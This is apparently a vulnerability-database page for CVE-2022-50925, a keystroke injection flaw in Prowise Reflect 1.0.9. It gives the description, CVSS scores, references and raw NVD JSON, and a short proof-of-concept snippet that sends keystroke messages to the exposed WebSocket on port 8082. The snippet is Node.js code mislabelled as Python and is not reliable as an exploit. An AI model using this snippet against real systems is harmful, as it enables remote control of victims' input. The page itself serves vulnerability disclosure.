CVE-2022-50925

Description

Prowise Reflect version 1.0.9 contains a remote keystroke injection vulnerability that allows attackers to send keyboard events through an exposed WebSocket on port 8082. Attackers can craft malicious web pages to inject keystrokes, opening applications and typing arbitrary text by sending specific WebSocket messages.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:prowise:reflect:1.0.9:*:*:*:*:*:*:* - VULNERABLE

Prowise Reflect < 1.0.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

const WebSocket = require('ws');

const target = 'ws://target:8082';
const ws = new WebSocket(target);

ws.on('open', () => {
  // 发送键盘注入命令
  const payload = JSON.stringify({
    type: 'keystroke',
    key: 'Enter',
    modifiers: []
  });
  ws.send(payload);
});

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50925
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50925
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50925/
[4] VulDB https://vuldb.com/cve/CVE-2022-50925
[5] https://www.exploit-db.com/exploits/50796
[6] https://www.prowise.com/
[7] https://www.vulncheck.com/advisories/prowise-reflect-remote-keystroke-injection
[8] https://www.exploit-db.com/exploits/50796

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50925", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:56.687", "lastModified": "2026-01-30T14:00:00.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Prowise Reflect version 1.0.9 contains a remote keystroke injection vulnerability that allows attackers to send keyboard events through an exposed WebSocket on port 8082. Attackers can craft malicious web pages to inject keystrokes, opening applications and typing arbitrary text by sending specific WebSocket messages."}, {"lang": "es", "value": "Prowise Reflect versión 1.0.9 contiene una vulnerabilidad de inyección remota de pulsaciones de teclas que permite a los atacantes enviar eventos de teclado a través de un WebSocket expuesto en el puerto 8082. Los atacantes pueden crear páginas web maliciosas para inyectar pulsaciones de teclas, abriendo aplicaciones y escribiendo texto arbitrario enviando mensajes WebSocket específicos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:prowise:reflect:1.0.9:*:*:*:*:*:*:*", "matchCriteriaId": "4941A2DE-0389-48CF-BB53-71145B6CD93A"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50796", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.prowise.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/prowise-reflect-remote-keystroke-injection", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50796", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}